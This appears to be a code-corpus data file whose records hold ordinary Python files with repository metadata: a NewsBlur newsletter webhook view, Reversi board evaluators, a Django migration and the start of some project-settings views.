|
e1c1c4fd23b88e8848fb944f71379d0944c81d34
|
[
"MIT"
] | null | null | null |
apps/newsletters/views.py
|
lance0428/NewsBlur
|
e1c1c4fd23b88e8848fb944f71379d0944c81d34
|
[
"MIT"
] | null | null | null |
apps/newsletters/views.py
|
lance0428/NewsBlur
|
e1c1c4fd23b88e8848fb944f71379d0944c81d34
|
[
"MIT"
] | null | null | null |
from pprint import pprint
from django.http import HttpResponse, Http404
from django.conf import settings
from utils import log as logging
from apps.newsletters.models import EmailNewsletter
from apps.rss_feeds.models import Feed, MStory
def newsletter_receive(request):
    """Inbound-email webhook: ingest a newsletter message as a story.

    The POST payload is a Mailgun-style message (sender, recipient, subject,
    body-plain, body-html, stripped-* variants, signature/token fields,
    message-headers, ...). It is handed verbatim to
    EmailNewsletter.receive_newsletter, which stores it.

    Returns HTTP 200 "OK" on success; raises Http404 when no story was
    created from the payload.

    NOTE(review): request.REQUEST was removed in Django 1.9 — confirm the
    project's Django version, or switch to request.POST.
    """
    response = HttpResponse('OK')
    if settings.DEBUG:
        # Bug fix: pprint() prints to stdout and returns None, so the old
        # code always logged the literal string "None". pformat() returns
        # the rendered text for the log message instead.
        from pprint import pformat
        logging.debug(" ---> Email newsletter: %s" % pformat(request.REQUEST))
    email_newsletter = EmailNewsletter()
    story = email_newsletter.receive_newsletter(request.REQUEST)
    if not story:
        raise Http404
    return response
def newsletter_story(request, story_hash):
    """Return the formatted content of a stored newsletter story.

    Looks the story up by its hash, runs it through Feed.format_story, and
    responds with the resulting 'story_content' HTML.
    """
    raw_story = MStory.objects.get(story_hash=story_hash)
    formatted = Feed.format_story(raw_story)
    return HttpResponse(formatted['story_content'])
| 203.4
| 3,953
| 0.646375
| 1,575
| 11,187
| 4.580317
| 0.150476
| 0.026615
| 0.045744
| 0.023288
| 0.824508
| 0.809121
| 0.767535
| 0.746465
| 0.721098
| 0.699196
| 0
| 0.105166
| 0.176365
| 11,187
| 55
| 3,954
| 203.4
| 0.677773
| 0.913113
| 0
| 0
| 0
| 0
| 0.043944
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.315789
| 0
| 0.526316
| 0.105263
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 11
|
2251754341deee657c2d4652bdc90f9ee3c8e527
| 63
|
py
|
Python
|
djangopypi/__init__.py
|
benliles/djangopypi
|
b62128979b3915cc8aeb1e6a8bfe59edd3243f0c
|
[
"BSD-3-Clause"
] | 31
|
2015-02-10T17:13:33.000Z
|
2021-10-05T04:48:55.000Z
|
djangopypi/__init__.py
|
EightMedia/djangopypi
|
a05a5a3872839f54dee43ebc5459230b7af36d4f
|
[
"BSD-3-Clause"
] | 5
|
2015-01-05T07:31:25.000Z
|
2021-01-03T00:56:57.000Z
|
djangopypi/__init__.py
|
EightMedia/djangopypi
|
a05a5a3872839f54dee43ebc5459230b7af36d4f
|
[
"BSD-3-Clause"
] | 10
|
2015-03-19T08:36:38.000Z
|
2017-12-07T20:27:42.000Z
|
from djangopypi import settings
from djangopypi import signals
| 21
| 31
| 0.873016
| 8
| 63
| 6.875
| 0.625
| 0.509091
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126984
| 63
| 2
| 32
| 31.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
97f44f03e7f00fbcc3e0a838ad9dcccbe56eba44
| 17,797
|
py
|
Python
|
reversi/strategies/coordinator/evaluator.py
|
y-tetsu/othello
|
73eabfe22d6b44bbfa0b436e6287e3e7356620f4
|
[
"MIT"
] | 10
|
2020-07-24T22:04:51.000Z
|
2022-03-25T06:09:48.000Z
|
reversi/strategies/coordinator/evaluator.py
|
y-tetsu/othello
|
73eabfe22d6b44bbfa0b436e6287e3e7356620f4
|
[
"MIT"
] | 12
|
2021-04-30T09:53:18.000Z
|
2022-02-25T04:16:02.000Z
|
reversi/strategies/coordinator/evaluator.py
|
y-tetsu/othello
|
73eabfe22d6b44bbfa0b436e6287e3e7356620f4
|
[
"MIT"
] | 1
|
2021-11-25T13:12:32.000Z
|
2021-11-25T13:12:32.000Z
|
"""Evaluator
"""
from reversi.strategies.common import AbstractEvaluator
from reversi.strategies.coordinator import TableScorer, PossibilityScorer, OpeningScorer, WinLoseScorer, NumberScorer, EdgeScorer, CornerScorer, BlankScorer, EdgeCornerScorer # noqa: E501
import reversi.strategies.coordinator.EvaluatorMethods as EvaluatorMethods
class Evaluator(AbstractEvaluator):
    """General Evaluator

    Combines two groups of scorers:
      separated: consulted in order; the first score that is not None is
                 returned as-is (short-circuits the rest).
      combined:  their scores are summed when no separated scorer decides.
    """
    def __init__(self, separated=None, combined=None):
        # Fix: the original signature used mutable default arguments ([]),
        # which are shared across every instance constructed without args.
        self.separated = [] if separated is None else separated
        self.combined = [] if combined is None else combined

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return the evaluation score of `board` for `color`."""
        for scorer in self.separated:
            score = scorer.get_score(color, board, possibility_b, possibility_w)
            if score is not None:
                return score
        return sum(s.get_score(color, board, possibility_b, possibility_w)
                   for s in self.combined)
class Evaluator_T(AbstractEvaluator):
    """Specific Evaluator Table

    Computes the board score from the positional weight table.
    """
    def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5):
        # Board size plus per-square weights (corner/c/a/b/x/o square classes).
        self.scorer = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)  # table-based score

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return the table score for `color` on `board`."""
        return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_P(AbstractEvaluator):
    """Specific Evaluator Possibility

    Computes the board score from the number of playable squares (mobility).
    """
    def __init__(self, wp=5):
        self.scorer = PossibilityScorer(wp)  # mobility-based score, weighted by wp

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return the mobility score for `color` on `board`."""
        return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_O(AbstractEvaluator):
    """Specific Evaluator Opening

    Computes the board score from the openness measure.
    """
    def __init__(self, wo=-0.75):
        self.scorer = OpeningScorer(wo)  # openness-based score, weighted by wo

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return the openness score for `color` on `board`."""
        return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_W(AbstractEvaluator):
    """Specific Evaluator WinLose

    Computes the board score from the win/loss outcome.
    """
    def __init__(self, ww=10000):
        self.scorer = WinLoseScorer(ww)  # win/loss score, weighted by ww

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return the win/loss score for `color` on `board`."""
        return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_N(AbstractEvaluator):
    """Specific Evaluator Number

    Computes the board score from the disc count.
    """
    def __init__(self):
        self.scorer = NumberScorer()  # disc-count-based score

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return the disc-count score for `color` on `board`."""
        return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_N_Fast(AbstractEvaluator):
    """Specific Evaluator Number

    Computes the board score from the disc count (black minus white),
    skipping the scorer indirection for speed.
    """
    def evaluate(self, color, board, possibility_b, possibility_w):
        # NOTE(review): reads the board's private counters directly —
        # presumably a hot-path shortcut; color and the possibility
        # arguments are ignored.
        black = board._black_score
        white = board._white_score
        return black - white
class Evaluator_E(AbstractEvaluator):
    """Specific Evaluator Edge

    Computes the score of edge patterns.
    """
    def __init__(self, w=100):
        self.scorer = EdgeScorer(w)  # edge-pattern score, weighted by w

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return the edge-pattern score for `color` on `board`."""
        return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_C(AbstractEvaluator):
    """Specific Evaluator Corner

    Computes the score of corner patterns.
    """
    def __init__(self, w=100):
        self.scorer = CornerScorer(w)  # corner-pattern score, weighted by w

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return the corner-pattern score for `color` on `board`."""
        return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_B(AbstractEvaluator):
    """Specific Evaluator Blank

    Computes the score of blank-square patterns.
    """
    def __init__(self, w1=-1, w2=-4, w3=-2):
        self.scorer = BlankScorer(w1, w2, w3)  # blank-square-pattern score

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return the blank-square score for `color` on `board`."""
        return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_Ec(AbstractEvaluator):
    """Specific Evaluator EdgeCorner

    Computes the score of edge-and-corner patterns.
    """
    def __init__(self, w1=1, w2=8):
        self.scorer = EdgeCornerScorer(w1, w2)  # edge-and-corner-pattern score

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return the edge-and-corner score for `color` on `board`."""
        return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_TP(AbstractEvaluator):
    """Specific Evaluator Table + Possibility

    Computes the board score as position table + mobility.
    """
    def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5):
        self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
        self.p = PossibilityScorer(wp)

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return table score + mobility score."""
        score_t = self.t.get_score(color, board, possibility_b, possibility_w)
        score_p = self.p.get_score(color, board, possibility_b, possibility_w)
        return score_t + score_p
class Evaluator_TPO(AbstractEvaluator):
    """Specific Evaluator Table + Possibility + Opening

    Computes the board score as position table + mobility + openness.
    """
    def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, wo=-0.75):
        self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
        self.p = PossibilityScorer(wp)
        self.o = OpeningScorer(wo)

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return table score + mobility score + openness score."""
        score_t = self.t.get_score(color, board, possibility_b, possibility_w)
        score_p = self.p.get_score(color, board, possibility_b, possibility_w)
        score_o = self.o.get_score(color, board, possibility_b, possibility_w)
        return score_t + score_p + score_o
class Evaluator_NW(AbstractEvaluator):
    """Specific Evaluator Number + WinLose

    Computes the board score as disc count + win/loss.
    """
    def __init__(self, ww=10000):
        self.n = NumberScorer()
        self.w = WinLoseScorer(ww)

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return win/loss score when the game is decided, else disc count."""
        score_w = self.w.get_score(color, board, possibility_b, possibility_w)
        # If the game outcome is already decided, return it directly.
        if score_w is not None:
            return score_w
        score_n = self.n.get_score(color, board, possibility_b, possibility_w)
        return score_n
class Evaluator_PW(AbstractEvaluator):
    """Specific Evaluator Possibility + WinLose

    Computes the board score as mobility + win/loss.
    """
    def __init__(self, wp=5, ww=10000):
        self.p = PossibilityScorer(wp)
        self.w = WinLoseScorer(ww)

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return win/loss score when the game is decided, else mobility."""
        score_w = self.w.get_score(color, board, possibility_b, possibility_w)
        # If the game outcome is already decided, return it directly.
        if score_w is not None:
            return score_w
        score_p = self.p.get_score(color, board, possibility_b, possibility_w)
        return score_p
class Evaluator_TPW(AbstractEvaluator):
    """Specific Evaluator Table + Possibility + WinLose

    Computes the board score as position table + mobility + win/loss.
    """
    def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, ww=10000):
        self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
        self.p = PossibilityScorer(wp)
        self.w = WinLoseScorer(ww)

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return win/loss score when decided, else table + mobility."""
        score_w = self.w.get_score(color, board, possibility_b, possibility_w)
        # If the game outcome is already decided, return it directly.
        if score_w is not None:
            return score_w
        score_t = self.t.get_score(color, board, possibility_b, possibility_w)
        score_p = self.p.get_score(color, board, possibility_b, possibility_w)
        return score_t + score_p
class Evaluator_TPW_Fast(AbstractEvaluator):
    """Specific Evaluator Table + Possibility + WinLose

    Computes the board score as position table + mobility + win/loss,
    delegating to the optimized EvaluatorMethods implementation.
    """
    def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, ww=10000):
        self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
        # NOTE(review): self.p and self.w look unused by evaluate() below —
        # possibly kept for interface parity with Evaluator_TPW; confirm.
        self.p = PossibilityScorer(wp)
        self.w = WinLoseScorer(ww)
        self.params = [wp, ww]  # weights handed to the fast implementation

    def evaluate(self, color, board, possibility_b, possibility_w):
        # Delegate to the optimized TPW evaluation routine.
        return EvaluatorMethods.evaluate_tpw(self.t, self.params, color, board, possibility_b, possibility_w)
class Evaluator_TPOW(AbstractEvaluator):
    """Specific Evaluator Table + Possibility + Opening + WinLose

    Computes the board score as position table + mobility + openness + win/loss.
    """
    def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, wo=-0.75, ww=10000):
        self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
        self.p = PossibilityScorer(wp)
        self.o = OpeningScorer(wo)
        self.w = WinLoseScorer(ww)

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return win/loss score when decided, else table + mobility + openness."""
        score_w = self.w.get_score(color, board, possibility_b, possibility_w)
        # If the game outcome is already decided, return it directly.
        if score_w is not None:
            return score_w
        score_t = self.t.get_score(color, board, possibility_b, possibility_w)
        score_p = self.p.get_score(color, board, possibility_b, possibility_w)
        score_o = self.o.get_score(color, board, possibility_b, possibility_w)
        return score_t + score_p + score_o
class Evaluator_TPWE(AbstractEvaluator):
    """Specific Evaluator Table + Possibility + WinLose + Edge

    Computes the board score as position table + mobility + win/loss + edge patterns.
    """
    def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, ww=10000, we=100):
        self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
        self.p = PossibilityScorer(wp)
        self.w = WinLoseScorer(ww)
        self.e = EdgeScorer(we)

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return win/loss score when decided, else table + mobility + edge."""
        score_w = self.w.get_score(color, board, possibility_b, possibility_w)
        # If the game outcome is already decided, return it directly.
        if score_w is not None:
            return score_w
        score_t = self.t.get_score(color, board, possibility_b, possibility_w)
        score_p = self.p.get_score(color, board, possibility_b, possibility_w)
        score_e = self.e.get_score(color, board, possibility_b, possibility_w)
        return score_t + score_p + score_e
class Evaluator_TPWE_Fast(AbstractEvaluator):
    """Specific Evaluator Table + Possibility + WinLose + Edge

    Computes the board score as position table + mobility + win/loss + edge
    patterns, delegating to the optimized EvaluatorMethods implementation.
    """
    def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, ww=10000, we=100):
        self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
        # NOTE(review): self.p, self.w and self.e look unused by evaluate()
        # below — possibly kept for interface parity; confirm.
        self.p = PossibilityScorer(wp)
        self.w = WinLoseScorer(ww)
        self.e = EdgeScorer(we)
        self.params = [wp, ww, we]  # weights handed to the fast implementation

    def evaluate(self, color, board, possibility_b, possibility_w):
        # Delegate to the optimized TPWE routine, passing the raw weight table.
        return EvaluatorMethods.evaluate_tpwe(self.t, self.t.table.table, self.params, color, board, possibility_b, possibility_w)
class Evaluator_TPWEC(AbstractEvaluator):
    """Specific Evaluator Table + Possibility + WinLose + Edge + Corner

    Computes the board score as position table + mobility + win/loss +
    edge patterns + corner patterns.
    """
    def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, ww=10000, we=100, wc=120):
        self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
        self.p = PossibilityScorer(wp)
        self.w = WinLoseScorer(ww)
        self.e = EdgeScorer(we)
        self.c = CornerScorer(wc)

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return win/loss score when decided, else table + mobility + edge + corner."""
        score_w = self.w.get_score(color, board, possibility_b, possibility_w)
        # If the game outcome is already decided, return it directly.
        if score_w is not None:
            return score_w
        score_t = self.t.get_score(color, board, possibility_b, possibility_w)
        score_p = self.p.get_score(color, board, possibility_b, possibility_w)
        score_e = self.e.get_score(color, board, possibility_b, possibility_w)
        score_c = self.c.get_score(color, board, possibility_b, possibility_w)
        return score_t + score_p + score_e + score_c
class Evaluator_PWE(AbstractEvaluator):
    """Specific Evaluator Possibility + WinLose + Edge

    Computes the board score as mobility + win/loss + edge patterns.
    """
    def __init__(self, size=8, wp=10, ww=10000, we=75):
        # NOTE(review): `size` is accepted but not used here — confirm.
        self.p = PossibilityScorer(wp)
        self.w = WinLoseScorer(ww)
        self.e = EdgeScorer(we)

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return win/loss score when decided, else mobility + edge."""
        score_w = self.w.get_score(color, board, possibility_b, possibility_w)
        # If the game outcome is already decided, return it directly.
        if score_w is not None:
            return score_w
        score_p = self.p.get_score(color, board, possibility_b, possibility_w)
        score_e = self.e.get_score(color, board, possibility_b, possibility_w)
        return score_p + score_e
class Evaluator_BW(AbstractEvaluator):
    """Specific Evaluator Blank + WinLose

    Computes the board score as blank squares + win/loss.
    """
    def __init__(self, wb1=-1, wb2=-4, wb3=-2, ww=10000):
        self.b = BlankScorer(wb1, wb2, wb3)
        self.w = WinLoseScorer(ww)

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return win/loss score when decided, else blank-square score."""
        score_w = self.w.get_score(color, board, possibility_b, possibility_w)
        # If the game outcome is already decided, return it directly.
        if score_w is not None:
            return score_w
        score_b = self.b.get_score(color, board, possibility_b, possibility_w)
        return score_b
class Evaluator_EcW(AbstractEvaluator):
    """Specific Evaluator EdgeCorner + WinLose

    Computes the board score as edge-and-corner patterns + win/loss.
    """
    def __init__(self, wec1=1, wec2=8, ww=10000):
        self.ec = EdgeCornerScorer(wec1, wec2)
        self.w = WinLoseScorer(ww)

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return win/loss score when decided, else edge-and-corner score."""
        score_w = self.w.get_score(color, board, possibility_b, possibility_w)
        # If the game outcome is already decided, return it directly.
        if score_w is not None:
            return score_w
        score_ec = self.ec.get_score(color, board, possibility_b, possibility_w)
        return score_ec
class Evaluator_BWEc(AbstractEvaluator):
    """Specific Evaluator Blank + WinLose + EdgeCorner

    Computes the board score as blank squares + edge-and-corner patterns + win/loss.
    """
    def __init__(self, wb1=-1, wb2=-4, wb3=-2, we1=1, we2=8, ww=10000):
        self.b = BlankScorer(wb1, wb2, wb3)
        self.ec = EdgeCornerScorer(we1, we2)
        self.w = WinLoseScorer(ww)

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return win/loss score when decided, else blank + edge-and-corner."""
        score_w = self.w.get_score(color, board, possibility_b, possibility_w)
        # If the game outcome is already decided, return it directly.
        if score_w is not None:
            return score_w
        score_b = self.b.get_score(color, board, possibility_b, possibility_w)
        score_ec = self.ec.get_score(color, board, possibility_b, possibility_w)
        return score_b + score_ec
class Evaluator_PBWEc(AbstractEvaluator):
    """Specific Evaluator Possibility + Blank + WinLose + EdgeCorner

    Computes the board score as mobility + blank squares + edge-and-corner
    patterns + win/loss.
    """
    def __init__(self, wp=5, wb1=-10, wb2=-40, wb3=-20, we1=10, we2=80, ww=10000):
        self.p = PossibilityScorer(wp)
        self.b = BlankScorer(wb1, wb2, wb3)
        self.ec = EdgeCornerScorer(we1, we2)
        self.w = WinLoseScorer(ww)

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return win/loss score when decided, else mobility + blank + edge-and-corner."""
        score_w = self.w.get_score(color, board, possibility_b, possibility_w)
        # If the game outcome is already decided, return it directly.
        if score_w is not None:
            return score_w
        score_p = self.p.get_score(color, board, possibility_b, possibility_w)
        score_b = self.b.get_score(color, board, possibility_b, possibility_w)
        score_ec = self.ec.get_score(color, board, possibility_b, possibility_w)
        return score_p + score_b + score_ec
class Evaluator_TPWEB(AbstractEvaluator):
    """Specific Evaluator Table + Possibility + WinLose + Edge + Blank

    Computes the board score as position table + mobility + win/loss +
    edge patterns + blank-square patterns.
    """
    def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, ww=10000, we=100, wb1=-5, wb2=-20, wb3=-10):
        self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
        self.p = PossibilityScorer(wp)
        self.w = WinLoseScorer(ww)
        self.e = EdgeScorer(we)
        self.b = BlankScorer(wb1, wb2, wb3)
        # NOTE(review): self.params looks unused by evaluate() below —
        # possibly a leftover from the *_Fast variants; confirm.
        self.params = [wp, ww, we]

    def evaluate(self, color, board, possibility_b, possibility_w):
        """Return win/loss score when decided, else table + mobility + edge + blank."""
        score_w = self.w.get_score(color, board, possibility_b, possibility_w)
        # If the game outcome is already decided, return it directly.
        if score_w is not None:
            return score_w
        score_t = self.t.get_score(color, board, possibility_b, possibility_w)
        score_p = self.p.get_score(color, board, possibility_b, possibility_w)
        score_e = self.e.get_score(color, board, possibility_b, possibility_w)
        score_b = self.b.get_score(color, board, possibility_b, possibility_w)
        return score_t + score_p + score_e + score_b
| 32.957407
| 188
| 0.638872
| 2,296
| 17,797
| 4.750871
| 0.06838
| 0.077008
| 0.161716
| 0.169417
| 0.805281
| 0.777778
| 0.740466
| 0.721672
| 0.721672
| 0.718097
| 0
| 0.035812
| 0.243749
| 17,797
| 539
| 189
| 33.018553
| 0.774649
| 0.13536
| 0
| 0.664
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.212
| false
| 0
| 0.012
| 0.012
| 0.492
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
58b4369fd43b6a0e93087765957edc575e02e7d1
| 2,571
|
py
|
Python
|
MatchApp/migrations/0010_auto_20210314_1808.py
|
elizza19/django_local_library
|
f2dc053e44684b7a966d8bc0ff364f5251449f5b
|
[
"Apache-2.0"
] | null | null | null |
MatchApp/migrations/0010_auto_20210314_1808.py
|
elizza19/django_local_library
|
f2dc053e44684b7a966d8bc0ff364f5251449f5b
|
[
"Apache-2.0"
] | null | null | null |
MatchApp/migrations/0010_auto_20210314_1808.py
|
elizza19/django_local_library
|
f2dc053e44684b7a966d8bc0ff364f5251449f5b
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.1.7 on 2021-03-14 17:08
from django.db import migrations, models
# All seven personality traits share the same 0-10 rating scale; build the
# identical choices list once instead of repeating it per field.
_SCALE_CHOICES = [(str(i), str(i)) for i in range(11)]

# Fields of personalidad_perro altered by this migration (original order kept).
_RATED_FIELDS = (
    'carinoso',
    'curioso',
    'deportista',
    'educado',
    'independiente',
    'jugueton',
    'tranquilo',
)


class Migration(migrations.Migration):
    """Re-declare the seven personality rating fields of
    ``personalidad_perro`` as nullable integers with 0-10 choices.
    """

    dependencies = [
        ('MatchApp', '0009_auto_20210314_1745'),
    ]

    operations = [
        migrations.AlterField(
            model_name='personalidad_perro',
            name=field_name,
            field=models.IntegerField(
                blank=True,
                choices=_SCALE_CHOICES,
                default=0,
                null=True,
            ),
        )
        for field_name in _RATED_FIELDS
    ]
| 52.469388
| 216
| 0.440685
| 309
| 2,571
| 3.61165
| 0.171521
| 0.125448
| 0.15681
| 0.1819
| 0.80914
| 0.80914
| 0.80914
| 0.764337
| 0.764337
| 0.764337
| 0
| 0.105641
| 0.24154
| 2,571
| 48
| 217
| 53.5625
| 0.466667
| 0.017503
| 0
| 0.666667
| 1
| 0
| 0.153328
| 0.009113
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02381
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
58d4a3d81149e5f3c585e2c8ec3265a6ca1458ac
| 21,016
|
py
|
Python
|
AutotestPlatform/website/project_setting_views.py
|
yzypals/AutoTestingPlatform
|
cfb2c53337406347fad37bd65568b22cdc76fdca
|
[
"Apache-2.0"
] | null | null | null |
AutotestPlatform/website/project_setting_views.py
|
yzypals/AutoTestingPlatform
|
cfb2c53337406347fad37bd65568b22cdc76fdca
|
[
"Apache-2.0"
] | 2
|
2020-06-06T00:51:32.000Z
|
2021-06-10T22:40:50.000Z
|
AutotestPlatform/website/project_setting_views.py
|
yzypals/AutoTestingPlatform
|
cfb2c53337406347fad37bd65568b22cdc76fdca
|
[
"Apache-2.0"
] | 1
|
2020-05-31T03:49:24.000Z
|
2020-05-31T03:49:24.000Z
|
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
from django.template import loader
import json
import logging
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.db.models import Max
from django.db import transaction
from website.models import UI_project_setting
from website.models import API_project_setting
from website.models import Test_project_setting
from website.models import Project_chosen
from website.models import Page_tree
from website.models import UI_case_tree
from website.models import API_case_tree
from website.models import Sprint_tree
from website.models import Database_setting
from website.models import UI_test_plan
from website.models import API_test_plan
from website.models import Running_plan
logger = logging.getLogger('mylogger')
# 项目管理-UI项目配置
def ui_project_setting(request):
    """Render the UI project settings page."""
    page = loader.get_template('website/pages/UIProjectSetting.html')
    return HttpResponse(page.render({}, request))
# 项目管理-API项目配置
def api_project_setting(request):
    """Render the API project settings page."""
    page = loader.get_template('website/pages/APIProjectSetting.html')
    return HttpResponse(page.render({}, request))
# 项目管理-测试项目配置
def test_project_setting(request):
    """Render the test project settings page."""
    page = loader.get_template('website/pages/TestProjectSetting.html')
    return HttpResponse(page.render({}, request))
# 获取列表数据
def get_ui_project_settings(request):
    """Return one page of UI project settings as datagrid JSON.

    Reads ``page`` (page number) and ``rows`` (page size) from the query
    string.  A non-integer page number falls back to page 1; an
    out-of-range page number falls back to the last page.  On any other
    error the exception text is returned as the response body.
    """
    griddata = {"total": 0, "rows": []}
    rows = []  # records of the requested page
    try:
        # Total record count, newest order first.
        records = UI_project_setting.objects.all().order_by('-order').values()
        griddata["total"] = len(records)
        page_num = request.GET.get('page')  # requested page number
        rows_num = request.GET.get('rows')  # requested page size
        paginator = Paginator(records, rows_num)
        try:
            page = paginator.page(page_num)
        except PageNotAnInteger as e:
            # Non-integer page number: return the first page.
            # logger.warn is deprecated (removed in Python 3.13); use warning.
            logger.warning('%s' % e)
            page = paginator.page(1)
        except EmptyPage as e:
            # Page number out of range: return the last page.
            logger.warning('%s' % e)
            page = paginator.page(paginator.num_pages)
        for obj in page.object_list:
            rows.append(obj)
        griddata["rows"] = rows
        griddata = json.dumps(griddata)
        return HttpResponse(griddata)
    except Exception as e:
        logger.error('%s' % e)
        return HttpResponse('%s' % e)
# 获取列表数据
def get_api_project_settings(request):
    """Return one page of API project settings as datagrid JSON.

    Reads ``page`` (page number) and ``rows`` (page size) from the query
    string.  A non-integer page number falls back to page 1; an
    out-of-range page number falls back to the last page.  On any other
    error the exception text is returned as the response body.
    """
    griddata = {"total": 0, "rows": []}
    rows = []  # records of the requested page
    try:
        # Total record count, newest order first.
        records = API_project_setting.objects.all().order_by('-order').values()
        griddata["total"] = len(records)
        page_num = request.GET.get('page')  # requested page number
        rows_num = request.GET.get('rows')  # requested page size
        paginator = Paginator(records, rows_num)
        try:
            page = paginator.page(page_num)
        except PageNotAnInteger as e:
            # Non-integer page number: return the first page.
            # logger.warn is deprecated (removed in Python 3.13); use warning.
            logger.warning('%s' % e)
            page = paginator.page(1)
        except EmptyPage as e:
            # Page number out of range: return the last page.
            logger.warning('%s' % e)
            page = paginator.page(paginator.num_pages)
        for obj in page.object_list:
            rows.append(obj)
        griddata["rows"] = rows
        griddata = json.dumps(griddata)
        return HttpResponse(griddata)
    except Exception as e:
        logger.error('%s' % e)
        return HttpResponse('%s' % e)
# 获取列表数据
def get_test_project_settings(request):
    """Return one page of test project settings as datagrid JSON.

    Reads ``page`` (page number) and ``rows`` (page size) from the query
    string.  A non-integer page number falls back to page 1; an
    out-of-range page number falls back to the last page.  On any other
    error the exception text is returned as the response body.
    """
    griddata = {"total": 0, "rows": []}
